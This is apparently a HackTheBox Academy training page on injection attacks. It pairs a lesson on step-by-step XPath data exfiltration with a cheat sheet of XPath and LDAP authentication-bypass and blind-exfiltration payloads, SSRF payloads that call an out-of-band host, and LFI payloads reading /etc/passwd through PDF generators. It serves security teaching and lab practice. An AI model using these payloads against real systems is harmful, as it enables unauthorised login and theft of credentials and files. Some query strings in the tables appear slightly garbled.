Injection Attacks

XPath - Advanced Data Exfiltration

Sometimes, it is impossible to extract the entire XML document at once. Consider a web application that only displays an XPath query's first five results. If we inject our previous payload such that the query returns the entire XML document, we can only exfiltrate the first 5 data points. Thus, we need to modify our payload to manually iterate through the entire XML document to exfiltrate all data.

Advanced Data Exfiltration

For this section, we are working on a slightly modified version of the web application from the previous section that limits the number of results returned so that we cannot exfiltrate the entire XML document at once. To iterate through the XML schema, we must first determine the schema depth. We can achieve this by ensuring the original XPath query returns no results and appending a new query that gives us information about the schema depth. We set the search term in the parameter q to anything that does not return data, for instance, SOMETHINGINVALID. We can then set the parameter f to fullstreetname | /*[1]. This results in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | /*[1]

The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node. Since the document root element node has multiple child nodes, it is of the data type array in PHP, which we can confirm when analyzing the response. The web application expects a string but receives an array and is thus unable to print the results, resulting in an empty response:

We can now determine the schema depth by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes. The results look like this (the q parameter remains the same as above for all requests):

Value of the `f` GET parameter	Response
`fullstreetname \| /*[1]`	Nothing
`fullstreetname \| /[1]/[1]`	Nothing
`fullstreetname \| /[1]/[1]/*[1]`	Nothing
`fullstreetname \| /[1]/[1]/[1]/[1]`	`01ST ST`
`fullstreetname \| /[1]/[1]/[1]/[1]/*[1]`	`No Results!`

From the above results, we can deduce that the schema depth for the street data is 4:

This allows us to start exfiltrating data by increasing the position in the last predicate until no more data can be retrieved:

Value of the `f` GET parameter	Response
`fullstreetname \| /[1]/[1]/[1]/[1]`	`01ST ST`
`fullstreetname \| /[1]/[1]/[1]/[2]`	`01ST`
`fullstreetname \| /[1]/[1]/[1]/[3]`	`ST`
`fullstreetname \| /[1]/[1]/[1]/[4]`	`No Results!`

We successfully exfiltrated information about the first street in the data set. The three values seem to be the long street name, the short street name, and a street type. We can thus fill in some of the placeholders of the XML schema from the previous section. However, remember that we still do not know the exact node names. We are just trying to create an overview of the structure of the XML document:

<a>
	<b>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</b>
</a>

We can now extract information about the second street in the data set by incrementing the second to last position predicate in our injected payload like so:

Value of the `f` GET parameter	Response
`fullstreetname \| /[1]/[1]/[2]/[1]`	`02ND AVE`
`fullstreetname \| /[1]/[1]/[2]/[2]`	`02ND`
`fullstreetname \| /[1]/[1]/[2]/[3]`	`AVE`
`fullstreetname \| /[1]/[1]/[2]/[4]`	`No Results!`

We can do this until we have exfiltrated information about all streets. However, since we are not interested in streets, let us see if the XML document contains other data sets. Incrementing the first position predicate in the payload makes little sense, as this is the document root, and valid XML documents only contain a single document root. However, we can alter the second position predicate to find additional data sets within the XML document. Remember that we need to determine the schema depth again, as it might differ from the depth of the streets data set. To illustrate this, consider the following sample XML document:

<dataset>
	<streets>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</streets>
	<users>
		<group name="users">
			<user>
				<username>test</username>
				<password>test</password>
			</user>
		</group>
		<group name="admins">
			<user>
				<username>admin</username>
				<password>admin</password>
			</user>
		</group>
	</users>
</dataset>

When querying the above XML document, the street nodes are at depth 3: /dataset/streets/street. However, the user nodes are at depth 4: /dataset/users/group/user. Thus, the depth is different, and we must determine it again to exfiltrate the users. We can determine the depth using the following parameter values. Since we are targeting the second data set in the XML document, we need to use /*[1]/*[2] as a starting point:

Value of the `f` GET parameter	Response
`fullstreetname \| /[1]/[2]`	Nothing
`fullstreetname \| /[1]/[2]/*[1]`	Nothing
`fullstreetname \| /[1]/[2]/[1]/[1]`	Nothing
`fullstreetname \| /[1]/[2]/[1]/[1]/*[1]`	`htb-stdnt`
`fullstreetname \| /[1]/[2]/[1]/[1]/[1]/[1]`	`No Results!`

We can see that the schema depth is 5. Furthermore, we seem to have exfiltrated a username. Just like we did with the streets data before, we can exfiltrate all user data by incrementing the last position predicate:

Value of the `f` GET parameter	Response
`fullstreetname \| /[1]/[2]/[1]/[1]/*[1]`	`htb-stdnt`
`fullstreetname \| /[1]/[2]/[1]/[1]/*[2]`	`295362c2618a05ba3899904a6a3f5bc0`
`fullstreetname \| /[1]/[2]/[1]/[1]/*[3]`	`HackTheBox Academy Student Account`
`fullstreetname \| /[1]/[2]/[1]/[1]/*[4]`	`No Results!`

From the data we exfiltrated, we seem to have leaked a user object consisting of a username, password hash, and description. We can now iteratively increment the position indices from right to left, just like we did with the street data set to exfiltrate all users.

Note: To exfiltrate an entire XML document, it makes sense to implement a simple script that does the exfiltration for us.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 7 Try to use what you learned in this section to exfiltrate the flag.

+10 Streak pts

Previous Next

Go to Questions

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />